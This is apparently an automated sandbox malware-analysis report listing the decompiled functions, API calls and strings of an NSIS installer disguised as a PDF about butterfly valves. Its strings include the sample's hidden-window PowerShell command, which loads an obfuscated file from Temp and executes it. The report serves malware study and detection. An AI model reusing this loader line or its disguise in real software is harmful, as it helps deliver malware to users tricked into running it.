GetCurrentProcess.KERNEL32(00000028,?), ref: 00403514
OpenProcessToken.ADVAPI32(00000000), ref: 0040351B
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403533
AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403552
ExitWindowsEx.USER32(00000002,80040002), ref: 00403576
ExitProcess.KERNEL32 ref: 00403599

Part of subcall function 004054EF: MessageBoxIndirectA.USER32(00409218), ref: 0040554A

Strings

C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe, xrefs: 004034B4
C:\Users\user\AppData\Local\Temp\, xrefs: 004032B7, 004032BC, 004032D2, 004032DE, 004032ED, 004032FA, 00403306, 0040330E, 00403407, 00403418, 00403423, 0040342F, 0040343C, 0040344B, 004034FA
.tmp, xrefs: 0040341E
C:\Users\user\Desktop, xrefs: 00403429, 0040342E, 0040345A
UXTHEME, xrefs: 00403121, 00403126, 0040312C
TMP, xrefs: 0040330F
C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe\laet\Unfilialness, xrefs: 004033B3
SeShutdownPrivilege, xrefs: 0040352D
"powershell.exe" -windowstyle hidden "$Superintendency=Get-Content 'C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe\Reshipment.Bag';$Fjernskrivendes=$Superintendency.SubString(1030,3);.$Fjernskrivendes($Superintendency)", xrefs: 00403469
\Temp, xrefs: 004032D9
Low, xrefs: 004032F5
`Kt, xrefs: 00403300
C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe, xrefs: 004032A7, 004033A8, 00403452, 0040345B
"C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe", xrefs: 0040318D, 00403193, 0040334C
1033, xrefs: 00403323
", xrefs: 004031EA
~nsu, xrefs: 00403402
TEMP, xrefs: 00403307
NSIS Error, xrefs: 00403178
Error launching installer, xrefs: 0040338E

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID: Process$Exit$EnvironmentFileHandleModulePathTempTokenVariableWindowslstrcat$AddressAdjustCharCommandCurrentDeleteDirectoryErrorIndirectInfoInitializeLineLookupMessageModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrlen
String ID: "$"C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe"$"powershell.exe" -windowstyle hidden "$Superintendency=Get-Content 'C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe\Reshipment.Bag';$Fjernskrivendes=$Superintendency.SubString(1030,3);.$Fjernskrivendes($Superintendency)"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe$C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe\laet\Unfilialness$C:\Users\user\Desktop$C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$`Kt$~nsu
API String ID: 3329125770-3710686692
Opcode ID: 4f4e7a4209cacf2233f42e90a73ac4821f0654123dbc60adf3f7537713659d44
Instruction ID: e7c85c4fe1f62676e3f8a08d8ca43f8bf3783ba147aef7bb7f1979754dcbcc24
Opcode Fuzzy Hash: 4f4e7a4209cacf2233f42e90a73ac4821f0654123dbc60adf3f7537713659d44
Instruction Fuzzy Hash: B7C1E5706083417AE711AF71AD8DA2B7EA8EB85306F04457FF541B61D2C77C5A05CB2E

Function 00405050 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 004050AF
GetDlgItem.USER32(?,000003EE), ref: 004050BE
GetClientRect.USER32(?,?), ref: 004050FB
GetSystemMetrics.USER32(00000002), ref: 00405102
SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405123
SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405134
SendMessageA.USER32(?,00001001,00000000,?), ref: 00405147
SendMessageA.USER32(?,00001026,00000000,?), ref: 00405155
SendMessageA.USER32(?,00001024,00000000,?), ref: 00405168
ShowWindow.USER32(00000000,?,0000001B,?), ref: 0040518A
ShowWindow.USER32(?,00000008), ref: 0040519E
GetDlgItem.USER32(?,000003EC), ref: 004051BF
SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004051CF
SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004051E8
SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004051F4
GetDlgItem.USER32(?,000003F8), ref: 004050CD

Part of subcall function 00403F13: SendMessageA.USER32(00000028,?,00000001,00403D44), ref: 00403F21

GetDlgItem.USER32(?,000003EC), ref: 00405210
CreateThread.KERNELBASE(00000000,00000000,Function_00004FE4,00000000), ref: 0040521E
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00405225
ShowWindow.USER32(00000000), ref: 00405248
ShowWindow.USER32(?,00000008), ref: 0040524F
ShowWindow.USER32(00000008), ref: 00405295
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052C9
CreatePopupMenu.USER32 ref: 004052DA
AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004052EF
GetWindowRect.USER32(?,000000FF), ref: 0040530F
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405328
SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405364
OpenClipboard.USER32(00000000), ref: 00405374
EmptyClipboard.USER32 ref: 0040537A
GlobalAlloc.KERNEL32(00000042,?), ref: 00405383
GlobalLock.KERNEL32(00000000), ref: 0040538D
SendMessageA.USER32(?,0000102D,00000000,?), ref: 004053A1
GlobalUnlock.KERNEL32(00000000), ref: 004053BA
SetClipboardData.USER32(00000001,00000000), ref: 004053C5
CloseClipboard.USER32 ref: 004053CB

Strings

Robotagtige Setup: Completed, xrefs: 00405340

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
String ID: Robotagtige Setup: Completed
API String ID: 4154960007-3813016551
Opcode ID: 2f7611a0bce828b228995c06d13905ff2deeaa3c0883401f0d5d6c5519410eed
Instruction ID: 36ba5585b1d224b9782629df23ee11add298fe1a6f2e37662bad4ed6ffe984ff
Opcode Fuzzy Hash: 2f7611a0bce828b228995c06d13905ff2deeaa3c0883401f0d5d6c5519410eed
Instruction Fuzzy Hash: 46A159B1900208BFDB119FA0DD85AAE7F79FB48355F10407AFA01B61A0C7B55E41DF69

Function 00405D1B Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 199
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersion.KERNEL32(?,sportspladsers,00000000,00404F4A,sportspladsers,00000000), ref: 00405DCC
GetSystemDirectoryA.KERNEL32(: Completed,00000400), ref: 00405E47
GetWindowsDirectoryA.KERNEL32(: Completed,00000400), ref: 00405E5A
SHGetSpecialFolderLocation.SHELL32(?,0040E8C0), ref: 00405E96
SHGetPathFromIDListA.SHELL32(0040E8C0,: Completed), ref: 00405EA4
CoTaskMemFree.OLE32(0040E8C0), ref: 00405EAF
lstrcatA.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00405ED1
lstrlenA.KERNEL32(: Completed,?,sportspladsers,00000000,00404F4A,sportspladsers,00000000), ref: 00405F23

Strings

sportspladsers, xrefs: 00405D4A
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00405ECB
Software\Microsoft\Windows\CurrentVersion, xrefs: 00405E16
"powershell.exe" -windowstyle hidden "$Superintendency=Get-Content 'C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe\Reshipment.Bag';$Fjernskrivendes=$Superintendency.SubString(1030,3);.$Fjernskrivendes($Superintendency)", xrefs: 00405EFB
: Completed, xrefs: 00405D42, 00405E14, 00405E31, 00405E46, 00405E59, 00405E75, 00405EA0, 00405ED0, 00405ED6, 00405EEE, 00405F01, 00405F1C, 00405F22, 00405F2D, 00405F57

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: "powershell.exe" -windowstyle hidden "$Superintendency=Get-Content 'C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe\Reshipment.Bag';$Fjernskrivendes=$Superintendency.SubString(1030,3);.$Fjernskrivendes($Superintendency)"$: Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$sportspladsers
API String ID: 900638850-2086963167
Opcode ID: fb8208971b7bef3eab874112c295b4c22afd955e6dbc7abb81a1d2e78964ecc6
Instruction ID: 70d043a0125fa0970afc212ad974551980140434863585fcf13b89b4fbf53fe2
Opcode Fuzzy Hash: fb8208971b7bef3eab874112c295b4c22afd955e6dbc7abb81a1d2e78964ecc6
Instruction Fuzzy Hash: AD61F471A04A01ABDF205F64DC88B7F3BA8DB41305F50803BE941B62D0D27D4A82DF5E

Function 0040559B Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileA.KERNELBASE(?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004055C4
lstrcatA.KERNEL32(00420D10,\*.*,00420D10,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040560C
lstrcatA.KERNEL32(?,00409014,?,00420D10,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040562D
lstrlenA.KERNEL32(?,?,00409014,?,00420D10,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405633
FindFirstFileA.KERNEL32(00420D10,?,?,?,00409014,?,00420D10,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405644
FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004056F1
FindClose.KERNEL32(00000000), ref: 00405702

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004055A8
"C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe", xrefs: 0040559B
\*.*, xrefs: 00405606

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-1895125917
Opcode ID: 460e34fa800b99f1e5f166b8e7224cb9b6121c256d4ab4e0343d3576c8fd47da
Instruction ID: 44541a5d5af4c0b2911f4644f2fa5328a4f1ed3919081d24b86541679c9c03d6
Opcode Fuzzy Hash: 460e34fa800b99f1e5f166b8e7224cb9b6121c256d4ab4e0343d3576c8fd47da
Instruction Fuzzy Hash: 9F51CF30804A04BADF217A658C85BBF7AB8DF82318F54847BF445761D2C73D4982EE6E

Function 0040205E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(00407408,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020DD
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402189

Strings

C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe\laet\Unfilialness, xrefs: 0040211D

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe\laet\Unfilialness
API String ID: 123533781-203921112
Opcode ID: 98c6856de954bf32f67bc9aae575288044ef0a57168b27d926b9bae310f30c25
Instruction ID: 15b8319daa3a69dadbe16bc3493db081a7dc62ee607a685d27ecc12527328b4b
Opcode Fuzzy Hash: 98c6856de954bf32f67bc9aae575288044ef0a57168b27d926b9bae310f30c25
Instruction Fuzzy Hash: 785138B1A00208BFCF10DFA4C988A9D7BB5FF48319F20856AF515EB2D1DB799941CB54

Function 00406344 Relevance: 5.4, APIs: 4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e28a8ad83f22bfe4c4d455a141f03dc38bf257c2203b46f6b1d5cba347f55b6d
Instruction ID: a8746b25a1c6b49bbeafbf020c2dfcaa04563a9eac1a8e827fb2969916571183
Opcode Fuzzy Hash: e28a8ad83f22bfe4c4d455a141f03dc38bf257c2203b46f6b1d5cba347f55b6d
Instruction Fuzzy Hash: 70F17670D00229CBCF18CFA8C8946ADBBB1FF44305F25816ED856BB281D7786A96CF44

Function 00405FFD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNELBASE(74DF3410,00421558,C:\Users\user\AppData\Local\Temp\nst5070.tmp,0040589C,C:\Users\user\AppData\Local\Temp\nst5070.tmp,C:\Users\user\AppData\Local\Temp\nst5070.tmp,00000000,C:\Users\user\AppData\Local\Temp\nst5070.tmp,C:\Users\user\AppData\Local\Temp\nst5070.tmp,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004055BB,?,74DF3410,C:\Users\user\AppData\Local\Temp\), ref: 00406008
FindClose.KERNEL32(00000000), ref: 00406014

Strings

C:\Users\user\AppData\Local\Temp\nst5070.tmp, xrefs: 00405FFD

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: C:\Users\user\AppData\Local\Temp\nst5070.tmp
API String ID: 2295610775-671699711
Opcode ID: fb61142ecab510d9bb051178c92cda44e9a3fae507c1338c77e1024ce068b834
Instruction ID: 1297c1e42099762feae64532f60583430090df1d404adb2e37743a0561846f6f
Opcode Fuzzy Hash: fb61142ecab510d9bb051178c92cda44e9a3fae507c1338c77e1024ce068b834
Instruction Fuzzy Hash: 8CD012319491206BC3105B38AD0C85B7A599F593317118A33F567F52F0C7788C7296E9

Function 00403A0B Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403A47
ShowWindow.USER32(?), ref: 00403A64
DestroyWindow.USER32 ref: 00403A78
SetWindowLongA.USER32(?,00000000,00000000), ref: 00403A94
GetDlgItem.USER32(?,?), ref: 00403AB5
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403AC9
IsWindowEnabled.USER32(00000000), ref: 00403AD0
GetDlgItem.USER32(?,00000001), ref: 00403B7E
GetDlgItem.USER32(?,00000002), ref: 00403B88
SetClassLongA.USER32(?,000000F2,?), ref: 00403BA2
SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403BF3
GetDlgItem.USER32(?,00000003), ref: 00403C99
ShowWindow.USER32(00000000,?), ref: 00403CBA
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403CCC
EnableWindow.USER32(?,?), ref: 00403CE7
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403CFD
EnableMenuItem.USER32(00000000), ref: 00403D04
SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403D1C
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403D2F
lstrlenA.KERNEL32(Robotagtige Setup: Completed,?,Robotagtige Setup: Completed,00422F00), ref: 00403D58
SetWindowTextA.USER32(?,Robotagtige Setup: Completed), ref: 00403D67
ShowWindow.USER32(?,0000000A), ref: 00403E9B

Strings

Robotagtige Setup: Completed, xrefs: 00403D44, 00403D4E, 00403D57, 00403D65

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: Robotagtige Setup: Completed
API String ID: 3282139019-3813016551
Opcode ID: 3ac918ef0a42e48e667534ebe08b1c5e2c6f4e88b6f53ea8c8a8fe3e2e231469
Instruction ID: e8e4c14712e0ebd1bd3c96694815290efe84e81baa174b168cbdfcdac135d6c4
Opcode Fuzzy Hash: 3ac918ef0a42e48e667534ebe08b1c5e2c6f4e88b6f53ea8c8a8fe3e2e231469
Instruction Fuzzy Hash: 29C1DF71A04205BBDB20AF61EE45E2B3E7CFB45706B40453EF601B11E1C779A942AB6E

Function 00403679 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406092: GetModuleHandleA.KERNEL32(?,?,?,00403143,00000009), ref: 004060A4
Part of subcall function 00406092: GetProcAddress.KERNEL32(00000000,?), ref: 004060BF

lstrcatA.KERNEL32(1033,Robotagtige Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Robotagtige Setup: Completed,00000000,00000002,74DF3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe",00000000), ref: 004036F4
lstrlenA.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe,1033,Robotagtige Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Robotagtige Setup: Completed,00000000,00000002,74DF3410), ref: 00403769
lstrcmpiA.KERNEL32(?,.exe), ref: 0040377C
GetFileAttributesA.KERNEL32(: Completed), ref: 00403787
LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe), ref: 004037D0

Part of subcall function 00405C57: wsprintfA.USER32 ref: 00405C64

RegisterClassA.USER32(00422EA0), ref: 0040380D
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403825
CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 0040385A
ShowWindow.USER32(00000005,00000000), ref: 00403890
GetClassInfoA.USER32(00000000,RichEdit20A,00422EA0), ref: 004038BC
GetClassInfoA.USER32(00000000,RichEdit,00422EA0), ref: 004038C9
RegisterClassA.USER32(00422EA0), ref: 004038D2
DialogBoxParamA.USER32(?,00000000,00403A0B,00000000), ref: 004038F1

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040367E
RichEd20, xrefs: 00403896
.DEFAULT\Control Panel\International, xrefs: 004036DF
_Nb, xrefs: 004037EC, 00403854
C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe, xrefs: 00403703, 0040370B, 004037A3, 004037A9, 004037B9
RichEdit20A, xrefs: 004038B4, 004038BA
Control Panel\Desktop\ResourceLocale, xrefs: 004036AD
"C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe", xrefs: 0040367D
1033, xrefs: 00403699, 004036EF
RichEdit, xrefs: 004038C3
Robotagtige Setup: Completed, xrefs: 004036A5, 004036AB, 004036D0, 004036D9, 004036EE
: Completed, xrefs: 00403737, 0040373F, 0040374C, 00403796, 0040379C
RichEd32, xrefs: 004038A4
.exe, xrefs: 00403776

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
